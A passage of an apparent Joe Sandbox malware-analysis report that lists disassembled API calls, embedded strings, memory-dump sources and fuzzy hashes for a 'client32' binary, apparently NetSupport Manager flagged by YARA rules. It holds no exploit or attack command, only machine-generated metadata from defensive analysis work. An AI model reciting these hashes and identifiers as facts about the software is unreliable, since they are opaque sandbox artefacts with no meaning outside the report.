                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,?,689C3061,?), ref: 689B69EB
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898), ref: 689B6A1B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                    • String ID: FAILED_REASON$LICENSE
                                                                                                                                                                                                    • API String ID: 3168844106-1913596546
                                                                                                                                                                                                    • Opcode ID: 214ed1eceff400a4b88f3bb9a35913cb1723a461bcb7f9c76b0c957817dc63fd
                                                                                                                                                                                                    • Instruction ID: 14a75bd1d2e1369e162711ffe65c7cc6daf26ed0c811ff2150acb328567166ab
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 214ed1eceff400a4b88f3bb9a35913cb1723a461bcb7f9c76b0c957817dc63fd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69419C32904502ABDB074E7899086AFBBF99F92349F844178DDA597300FB31F909C3D0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 689D65E3: GetOEMCP.KERNEL32(00000000,?,689DEF75,?,?,?), ref: 689D660C
                                                                                                                                                                                                      • Part of subcall function 689DD3B0: Sleep.KERNEL32(00000000,00000001,689D6E81,?,689DF447,00000018,689F7738,0000000C,689DF4D7,689D6E81,00000000,?,689D6E81,0000000D), ref: 689DD3D1
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(85038B09), ref: 689D68FC
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00000000), ref: 689D6921
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32 ref: 689D69B3
                                                                                                                                                                                                    • InterlockedIncrement.KERNEL32(00000000), ref: 689D69D7
                                                                                                                                                                                                      • Part of subcall function 689D1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 689D1C13
                                                                                                                                                                                                      • Part of subcall function 689D1BFD: GetLastError.KERNEL32(00000000), ref: 689D1C25
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Interlocked$DecrementIncrement$ErrorFreeHeapLastSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1703371082-0
                                                                                                                                                                                                    • Opcode ID: 8d4ba0beef8509e144ee54f63c5147f906e0867a18356527f6a65eec600bd488
                                                                                                                                                                                                    • Instruction ID: b5068eb145a478cf56d9a0ec50b4535dab68a67c6b2667f42240fbf3bd760a27
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d4ba0beef8509e144ee54f63c5147f906e0867a18356527f6a65eec600bd488
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53411375808A048FCB029F78D98475D7BF4AF1A328F90C469D9A1EB291CB38D840CBD8
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 110A7319
                                                                                                                                                                                                    • CreateRectRgn.GDI32(?,110A83D7,?,?), ref: 110A737B
                                                                                                                                                                                                    • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 110A7388
                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110A738F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateRect$CombineDeleteObject
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1735589438-0
                                                                                                                                                                                                    • Opcode ID: 45fb47227f938c3ac32ba62ad7cea327fe5f4bc887be3da3503991b144b35159
                                                                                                                                                                                                    • Instruction ID: 7c55b913b2b2c5e9ceebf247f0e200ebac5932dc0e21f1d57c3ddac5f96fd2c0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45fb47227f938c3ac32ba62ad7cea327fe5f4bc887be3da3503991b144b35159
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F219236A00119ABCB04DBA9D884CBFB7BAEFC9710711C199FA46D3254E6309D42D7E1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110CCA10: EnterCriticalSection.KERNEL32(00000000,00000000,BBC4A55B,?,?,?,BBC4A55B), ref: 110CCA4A
                                                                                                                                                                                                      • Part of subcall function 110CCA10: LeaveCriticalSection.KERNEL32(00000000,?,?,?,BBC4A55B), ref: 110CCAB2
                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 110CD2FB
                                                                                                                                                                                                      • Part of subcall function 110CAFC0: GetCurrentThreadId.KERNEL32 ref: 110CAFC9
                                                                                                                                                                                                    • RemovePropA.USER32(?), ref: 110CD328
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CD33C
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CD346
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalDeleteObjectSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3515130325-0
                                                                                                                                                                                                    • Opcode ID: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
                                                                                                                                                                                                    • Instruction ID: 1912d5f7d6517959c15795f1203ad34c6d2ee6b6a386a3d84c59d9fd341526e4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57214BB5E007559BDB20DF69D844B5FFBE8AB44B18F004A6DE86297680D774E440CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,00000000,?,?,?,?,?,689BD68F), ref: 689B596C
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898,?,?,?,?,?,689BD68F), ref: 689B597D
                                                                                                                                                                                                    • SetEvent.KERNEL32(000002F4,?,?,?,?,?,689BD68F), ref: 689B59B7
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898,?,?,?,?,?,689BD68F), ref: 689B59CC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3394196147-0
                                                                                                                                                                                                    • Opcode ID: 4b8345c161b4c37e7cdf2b77008ab64d9bccff3cb3aa509a4a7d75a8aab18e6c
                                                                                                                                                                                                    • Instruction ID: 7a7b249223269252bff41db9629150a08afbe6662fc116d930d04117da638d17
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b8345c161b4c37e7cdf2b77008ab64d9bccff3cb3aa509a4a7d75a8aab18e6c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0121B571D082089FDF04DFA8D9047AEBBF8FF89318F50815ED85AA7240D771AA45CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • timeGetTime.WINMM ref: 110590FC
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110591AA
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 110591C4
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 110591E9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterTimetime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1178526778-0
                                                                                                                                                                                                    • Opcode ID: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
                                                                                                                                                                                                    • Instruction ID: de64faa2bc893f0042d2db027e64659f3d2cecc70f566eade1ffbf0f13490889
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85216B75E006269FCB84DFA8C8C496EF7B8FF497047008A6DE926D7604E730E910CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
                                                                                                                                                                                                    • API String ID: 3472027048-2181447511
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(689FB898,?), ref: 689B68AE
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(689FB898), ref: 689B68C3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                    • String ID: ERROR$RESULT
                                                                                                                                                                                                    • API String ID: 3168844106-833402571
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SystemParametersInfoA.USER32(00000029,00000154,?,00000000), ref: 111313B1
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 111313CF
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 111313E5
                                                                                                                                                                                                    • CreateFontIndirectA.GDI32(FFFFFFF0), ref: 111313FB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFontIndirect$InfoParametersSystem
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3386289337-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 11007327
                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 11007383
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFocusWindowwsprintf
                                                                                                                                                                                                    • String ID: edit
                                                                                                                                                                                                    • API String ID: 4214736919-2167791130
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004C), ref: 110948BE
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004D), ref: 110948C7
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004E), ref: 110948CE
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000000), ref: 110948D7
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(0000004F), ref: 110948DD
                                                                                                                                                                                                      • Part of subcall function 110948B0: GetSystemMetrics.USER32(00000001), ref: 110948E5
                                                                                                                                                                                                    • GetRegionData.GDI32(?,00001000,?), ref: 1103F2D5
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MetricsSystem$DataErrorExitLastMessageProcessRegionwsprintf
                                                                                                                                                                                                    • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                                                                    • API String ID: 1231476184-2270926670
                                                                                                                                                                                                    • Opcode ID: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
                                                                                                                                                                                                    • Instruction ID: 7bd6763c5981859c823165d8063a1c4bf52d6bb4432795ccb6ce09120d22f5b2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcf8010bd49bb8a48e5ff97e5ecb267e14ecb5a38bedc9232b3b103d8f10203e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2613DB5E001AA9FCB24CF54CD84ADDF3B5BF88304F0082D9E689A7244DAB46E85CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00008005,00000000,00000000,00000000), ref: 1109F821
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FolderPath
                                                                                                                                                                                                    • String ID: Journal$JournalPath
                                                                                                                                                                                                    • API String ID: 1514166925-2350371490
                                                                                                                                                                                                    • Opcode ID: 571c3e433b90cf46d3ab01637cb7f0e16e325cbb2de70bdab3eef7d4294da6b6
                                                                                                                                                                                                    • Instruction ID: 434bd909b2f05ad915dc038db26f6da4a37d97d5394bf5eacfbf409b598c8e34
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 571c3e433b90cf46d3ab01637cb7f0e16e325cbb2de70bdab3eef7d4294da6b6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1414A31E042AE5BD712CF288CA4BDBFFE4EF45744F1045E9D8999B340EA31A908C792
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110758B0: GlobalAddAtomA.KERNEL32(NSMCoolbar), ref: 11075905
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32 ref: 11075923
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32(00000014), ref: 1107592A
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32(00000010), ref: 11075931
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32(00000008), ref: 11075938
                                                                                                                                                                                                      • Part of subcall function 110758B0: GetSysColor.USER32(00000016), ref: 1107593F
                                                                                                                                                                                                      • Part of subcall function 110AE730: InitializeCriticalSection.KERNEL32(00000154,00000000,110BD632,BBC4A55B,00000000,00000000,00000000,00000000,00000000,111819F4,000000FF,?,1105D27F,?), ref: 110AE741
                                                                                                                                                                                                      • Part of subcall function 1110D060: GetCurrentThreadId.KERNEL32 ref: 1110D0F6
                                                                                                                                                                                                      • Part of subcall function 1110D060: InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003BC), ref: 1110D109
                                                                                                                                                                                                      • Part of subcall function 1110D060: InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003BC), ref: 1110D118
                                                                                                                                                                                                      • Part of subcall function 1110D060: EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
                                                                                                                                                                                                      • Part of subcall function 1110D060: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
                                                                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 110BD6C2
                                                                                                                                                                                                      • Part of subcall function 110CA340: InterlockedIncrement.KERNEL32(111E2E04), ref: 110CA348
                                                                                                                                                                                                      • Part of subcall function 110CA340: CoInitialize.OLE32(00000000), ref: 110CA36C
                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMCobrowse), ref: 110BD715
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ColorInitialize$CriticalSection$AtomGlobal$CreateCurrentEnterEventIncrementInterlockedThread
                                                                                                                                                                                                    • String ID: NSMCobrowse
                                                                                                                                                                                                    • API String ID: 2361268844-2243205248
                                                                                                                                                                                                    • Opcode ID: 41011bd8560fb5f141d205fb2c1a52753a0e4664b1f28dd26127bffe8820e076
                                                                                                                                                                                                    • Instruction ID: 226d89ac1b4541342643fefbc1fc1e817936d527e4f01f79d48319a6218e5bfa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41011bd8560fb5f141d205fb2c1a52753a0e4664b1f28dd26127bffe8820e076
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92513778904B85DFD720CFA9C59479EFBE4BF18308F5089ADD4AA93241DB747604CB62
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000,00000000,765A2E90), ref: 110EB1B1
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110EB20A
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: QueryValue$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID: Error %d getting %s
                                                                                                                                                                                                    • API String ID: 3552358119-2709163689
                                                                                                                                                                                                    • Opcode ID: 0046b0664d19f7641861727aad713b787865af9cbe24966e149ad3e7038788ce
                                                                                                                                                                                                    • Instruction ID: 4c35e499aaf5ad9a009ae928ade364ef1dd2f983720d507f3f6301ea2f5437f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0046b0664d19f7641861727aad713b787865af9cbe24966e149ad3e7038788ce
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA316175D001299FDB90DA55CC84BAEB7F9AF45304F05C0E9E959A7240DE306E85CFE1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 1101F664
                                                                                                                                                                                                      • Part of subcall function 1115BD70: SetPropA.USER32(00000000,00000000), ref: 1115BD8E
                                                                                                                                                                                                      • Part of subcall function 1115BD70: SetWindowLongA.USER32(00000000,000000FC,1115B780), ref: 1115BD9F
                                                                                                                                                                                                      • Part of subcall function 1115AC80: SetPropA.USER32(?,?,?), ref: 1115ACD5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • OnDestroy - delete m_WBFrameWnd, xrefs: 1101F62A
                                                                                                                                                                                                    • Chat Window Destroyed, xrefs: 1101F57B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Prop$DeleteLongObjectWindow
                                                                                                                                                                                                    • String ID: Chat Window Destroyed$OnDestroy - delete m_WBFrameWnd
                                                                                                                                                                                                    • API String ID: 2163963939-4047192309
                                                                                                                                                                                                    • Opcode ID: f958c79b477abf9a0fea9acb7af46adbfcf8098553b161982d9ac6736f897051
                                                                                                                                                                                                    • Instruction ID: 09d21a9cb39090529c9d6542565f0688f2ad478e5cfbe18cf914d43a02743bba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f958c79b477abf9a0fea9acb7af46adbfcf8098553b161982d9ac6736f897051
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C731E4B5B00701ABE350CF65D880F6FF7A6EF85718F14461DE86A5B390DB75B9008B92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00000400,?,00000000,00000000,BBC4A55B,00000401,?,?,00000000,BBC4A55B), ref: 111432DB
                                                                                                                                                                                                    • wvsprintfA.USER32(BBC4A55B,?,?), ref: 111432F2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>, xrefs: 1114330A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FormatMessagewvsprintf
                                                                                                                                                                                                    • String ID: ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>
                                                                                                                                                                                                    • API String ID: 65494530-3330918973
                                                                                                                                                                                                    • Opcode ID: 4f255fee6f7a36d2343be92b14a67b8c036efb71b9771a05c8b56e11d64a2540
                                                                                                                                                                                                    • Instruction ID: 325346ff02c3342125f3bb2915ef43e6aa784d2796c19ba5a5be54d08933bc26
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f255fee6f7a36d2343be92b14a67b8c036efb71b9771a05c8b56e11d64a2540
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA21B6B1D1422DAED710CB94DC81FEFFBBCEB44614F104169EA0993240DB75AA84CBA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(00000000,?,00000000,00000100), ref: 11075827
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • ..\ctl32\Coolbar.cpp, xrefs: 11075799
                                                                                                                                                                                                    • iItem >= 0 && iItem < m_iCount, xrefs: 1107579E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                    • String ID: ..\ctl32\Coolbar.cpp$iItem >= 0 && iItem < m_iCount
                                                                                                                                                                                                    • API String ID: 2948472770-4239703120
                                                                                                                                                                                                    • Opcode ID: abd63514fababd9a214bda0e451b90652d8b0dd532cae6cc375061762a272325
                                                                                                                                                                                                    • Instruction ID: 1618788a3872c7e9ead9d95210fd8adda4dd1e4e11fe28ba26c33bee5626ba4c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: abd63514fababd9a214bda0e451b90652d8b0dd532cae6cc375061762a272325
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D121F175A00226ABCB10CF68CC81F9A7BA8AF48314F114058FC45AF382EA71F840CBD4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,765A5530), ref: 11141457
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11141496
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                    • API String ID: 2034136378-336475711
                                                                                                                                                                                                    • Opcode ID: 76eb55f7976ca971e771bf37928c8bbd7d03770ae7a3fc3964c2ba1f648ec2b8
                                                                                                                                                                                                    • Instruction ID: d12c9fbe21fce9ebe84299b8ab088ed5ba47cc188f1fd16cec63c381e0116ac0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76eb55f7976ca971e771bf37928c8bbd7d03770ae7a3fc3964c2ba1f648ec2b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90213774E043599BDB11CF68CC44BDAF7785B11708F1482D8D69497142DB707688CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 689B2ACB
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 689B2B05
                                                                                                                                                                                                      • Part of subcall function 689B2CE0: GetModuleHandleA.KERNEL32(NSMTRACE,689B2AB1), ref: 689B2CFA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
